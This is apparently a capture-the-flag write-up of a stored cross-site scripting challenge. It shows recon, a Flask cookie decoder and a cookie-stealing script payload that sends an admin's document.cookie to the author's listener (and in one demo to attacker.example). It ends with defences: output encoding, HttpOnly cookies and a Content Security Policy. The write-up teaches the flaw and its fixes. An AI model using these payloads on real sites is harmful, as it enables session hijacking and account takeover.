This challenge is a good reminder that the most dangerous vulnerabilities aren't always about complex exploit chains. Sometimes it's just: user input goes in, admin sees it, admin's browser executes it. Game over.

Here's how it went.



Recon

A port scan revealed the usual suspects, SSH on 22 and HTTP on 80, plus one odd one: port 631 running IPP (Internet Printing Protocol), which is a printer protocol.

Interesting, but not relevant here. It's a good habit to note these things anyway because you never know what might become useful later.

The web app itself is minimal. There's a survey form and not much else visible.



So I fuzzed for hidden directories.

That turned up three endpoints: /admin, /login, and /logout. Visiting /admin just redirected me to /login. No way to create an account, and basic SQL injection on the login form went nowhere. Username enumeration wasn't possible either.

So the login was a dead end for now.





The Cookie That Wasn't a JWT

After filling out the survey, I noticed the server set a cookie.

It had that familiar base64 look that makes you think "JWT", but pasting it into jwt.io told a different story. It was a Flask session cookie, not a JWT.

This is a small but important distinction. Flask session cookies are signed with the app's secret key, but they're not encrypted, so anyone holding one can decode the payload and read its contents. More importantly for this challenge, it got me thinking about whose cookie would be valuable.
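To make "signed but not encrypted" concrete, here is a minimal sketch of decoding such a cookie with only the Python standard library. It assumes the usual Flask layout of `payload.timestamp.signature`, with a leading dot marking a zlib-compressed payload. The function name and the sample cookie are made up for illustration, and no signature check is performed.

```python
import base64
import json
import zlib


def decode_flask_session(cookie: str) -> dict:
    """Return the JSON payload of a Flask-style session cookie without verifying it."""
    # A leading "." marks a zlib-compressed payload.
    compressed = cookie.startswith(".")
    if compressed:
        cookie = cookie[1:]
    # The payload is the first dot-separated segment.
    payload = cookie.split(".")[0]
    # Restore the base64 padding that is stripped from the cookie.
    payload += "=" * (-len(payload) % 4)
    raw = base64.urlsafe_b64decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


# Hypothetical cookie built for this demo; the timestamp and signature are dummies.
sample_payload = base64.urlsafe_b64encode(b'{"survey_done": true}').decode().rstrip("=")
sample_cookie = f"{sample_payload}.ZxYwVg.not-a-real-signature"
print(decode_flask_session(sample_cookie))
```

Reading the payload needs no secret key. Forging a modified cookie is a different matter, since the signature would no longer match.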

If an admin is reviewing survey submissions… and the survey input isn't sanitised… that's a stored XSS waiting to happen.

The Attack Plan

Stored XSS works like this: you inject a malicious script into an input field that gets stored in the database. Later, when another user (ideally a privileged one) views that content, their browser executes your script in their context, with their cookies, their session, their permissions.
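As a rough illustration of that pattern (not the challenge's actual code, which I never saw), the sketch below stores input untouched and later pastes it into HTML. The list standing in for the database, the function names, and the `attacker.example` host are all hypothetical.

```python
# Hypothetical in-memory stand-in for the survey database.
stored_names: list[str] = []


def submit_survey(name: str) -> None:
    """Store the submitted name exactly as received, with no validation."""
    stored_names.append(name)


def render_admin_review() -> str:
    """Build the admin's review page by pasting stored input straight into HTML."""
    rows = "".join(f"<li>{name}</li>" for name in stored_names)
    return f"<ul>{rows}</ul>"


submit_survey("Alice")
submit_survey('<script>fetch("http://attacker.example/?c="+document.cookie)</script>')
page = render_admin_review()
print(page)
```

The second submission comes back out as a live script tag inside the page, which is exactly what the admin's browser would execute.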

The plan was simple:

- Inject a script into the survey that steals cookies and sends them to me.

- Wait for the admin to review the survey.

- Catch the request on my listener.

- Use the admin's cookie to access /admin.



Executing the Attack

I started a simple HTTP listener on my machine:

    python3 -m http.server 4444

Then I submitted the survey with this payload in the "name" field:

    <script>fetch("http://<MY_IP>:4444/?test1="%2bdocument.cookie);</script>

What this does: when the admin's browser renders the survey response, it executes the script, which makes a fetch request to my server with the admin's cookie appended as a query parameter. The "%2b" is the URL-encoded form of "+". In a URL-encoded form submission a literal "+" is decoded as a space, which would break the string concatenation.
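The "+" versus "%2b" behaviour can be checked with Python's `urllib.parse.unquote_plus`, which applies the same form-decoding rules. This is only a sketch of the decoding step, assuming the server treats the survey body as URL-encoded form data; the shortened payloads are illustrative.

```python
from urllib.parse import unquote_plus

# Two versions of a shortened payload, as they might travel in the form body.
literal_plus = 'fetch("http://x/?c="+document.cookie)'
encoded_plus = 'fetch("http://x/?c="%2bdocument.cookie)'

# Form decoding turns "+" into a space and "%2b" into "+".
print(unquote_plus(literal_plus))
print(unquote_plus(encoded_plus))
```

Only the second version arrives at the server with the concatenation operator intact.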

A short wait later, a request came in on my listener.
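The stock `http.server` module just logs the raw request line, which was enough here. For a slightly more readable capture, a small custom handler could parse the query string instead. The sketch below is an assumption about how one might do that, not what I ran; `ExfilHandler`, `extract_params`, and `run_listener` are illustrative names.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def extract_params(path: str) -> dict[str, list[str]]:
    """Decode the query parameters from a request path."""
    return parse_qs(urlsplit(path).query)


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        # Print the sender's address and the decoded parameters, then answer 200.
        print(f"{self.client_address[0]} sent {extract_params(self.path)}")
        self.send_response(200)
        self.end_headers()


def run_listener(port: int = 4444) -> None:
    """Serve until interrupted; the port should match the one in the payload."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Calling `run_listener()` starts the server; `extract_params` can also be used on its own to decode a request line copied from the default listener's log.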

I looked at the query parameter value. It was the flag.

The Twist

I was expecting to get a session cookie, use it to log into /admin, and find the flag there. But the cookie itself was the flag. A nice surprise from the challenge designers and a good demonstration of why cookie exfiltration is such a serious attack in real applications. In a real scenario, that cookie would have been a live session token giving full admin access.

What I Learned

This challenge is a textbook example of why output encoding matters. The survey input was stored as-is and rendered directly into the admin's browser without any sanitisation. That single oversight created a direct path to privilege escalation.

It also reinforced something about recon: finding the /admin endpoint early was important. It told me there was a privileged user in the system worth targeting, which shaped the entire attack strategy.

How Could This Have Been Prevented?

The fix here isn't complicated. The problem is simply that user input was trusted and rendered raw.

The most fundamental fix is to HTML-encode any user-submitted content before displaying it. This turns <script> into &lt;script&gt;: harmless text instead of executable code. Most modern web frameworks do this by default if you use their templating engine correctly, which suggests the developer may have bypassed the default safe rendering somewhere.
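As a small demonstration of what that encoding does, Python's standard `html.escape` can stand in for a templating engine's auto-escaping. The payload and the `attacker.example` host are illustrative.

```python
import html

payload = '<script>fetch("http://attacker.example/?c="+document.cookie)</script>'

# Replace the characters that HTML treats as markup with entities.
safe = html.escape(payload)
print(safe)
```

The escaped string is displayed by the browser as literal text, so the script never runs.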

On top of that, setting the HttpOnly flag on the session cookie would have broken this specific attack entirely. HttpOnly tells the browser not to expose the cookie to JavaScript, so document.cookie would not have included it. The XSS would still exist, but cookie theft via this method would be blocked.
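For reference, this is roughly what the flag looks like on the wire, sketched with Python's standard `http.cookies` module. The cookie name and value are placeholders. In a Flask app the session cookie's flag is controlled by the `SESSION_COOKIE_HTTPONLY` setting rather than set by hand like this.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "example-session-value"  # placeholder value
cookie["session"]["httponly"] = True         # hide the cookie from document.cookie
cookie["session"]["path"] = "/"

# The string a server would send in its Set-Cookie response header.
header_value = cookie["session"].OutputString()
print("Set-Cookie:", header_value)
```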

A Content Security Policy would add another layer: by restricting which scripts are allowed to run, a well-configured CSP can prevent inline script injection from executing in the first place.
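A minimal sketch of such a policy, built here as a plain header tuple so it is not tied to any framework. The exact directives are an assumption about what would suit an app like this one: `script-src 'self'` without `'unsafe-inline'` blocks injected inline scripts, and `connect-src 'self'` limits where `fetch` may send requests.

```python
def build_csp_header() -> tuple[str, str]:
    """Return a (name, value) pair for a restrictive Content-Security-Policy."""
    directives = {
        "default-src": "'self'",
        "script-src": "'self'",   # no 'unsafe-inline', so inline <script> is refused
        "connect-src": "'self'",  # fetch/XHR only to the app's own origin
    }
    value = "; ".join(f"{name} {sources}" for name, sources in directives.items())
    return ("Content-Security-Policy", value)


name, value = build_csp_header()
print(f"{name}: {value}")
```

A policy this strict would break any legitimate inline scripts the app relies on, so those would need to move to separate files first.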

Three independent defences, any one of which would have stopped this attack.

Thanks for reading. More writeups from this CTF coming soon.